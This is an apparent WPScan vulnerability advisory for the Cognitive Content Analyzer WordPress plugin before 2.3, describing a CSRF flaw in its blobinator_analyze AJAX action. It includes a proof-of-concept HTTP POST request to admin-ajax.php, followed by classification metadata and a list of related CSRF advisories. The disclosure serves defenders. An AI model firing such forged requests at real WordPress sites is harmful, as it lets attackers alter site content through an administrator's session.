Cognitive Content Analyzer < 2.3 – Unauthorised AJAX call via CSRF | Plugin Vulnerabilities

Description

The plugin did not properly check for CSRF in its blobinator_analyze AJAX action, allowing attacker to make a logged in administrator call the blobinator_process_text method with arbitrary parameters and update the related post with the results.

Proof of Concept

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 78
Connection: close
Cookie: [CSRF cookies]

action=blobinator_analyze&blobinator_text_to_analyze=aa&service=test&post_ID=1

Affects Plugins

Fixed in 2.3

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

aec27da2-dd61-4bd5-9163-a999716f6cb6

Timeline

Publicly Published

2021-06-30 (about 4 years ago)

Added

2021-06-30 (about 4 years ago)

Last Updated

2021-06-30 (about 4 years ago)

Other

Published

Title

Published

2024-08-17

Title

WP MultiTasking <= 0.1.12 - Settings Update via CSRF

Published

2025-12-20

Title

SEO Search < 1.2 - Cross-Site Request Forgery

Published

2020-10-14

Title

Child Theme Creator by Orbisius < 1.5.2 - CSRF to Arbitrary File Modification/Creation

Published

2022-06-15

Title

Sharebar <= 1.4.1 - Arbitrary Settings Update to Stored XSS via CSRF

Published

2024-07-17

Title

Cooked – Recipe Management < 1.8.0 - Cross-Site Request Forgery via cooked_get_recipe_ids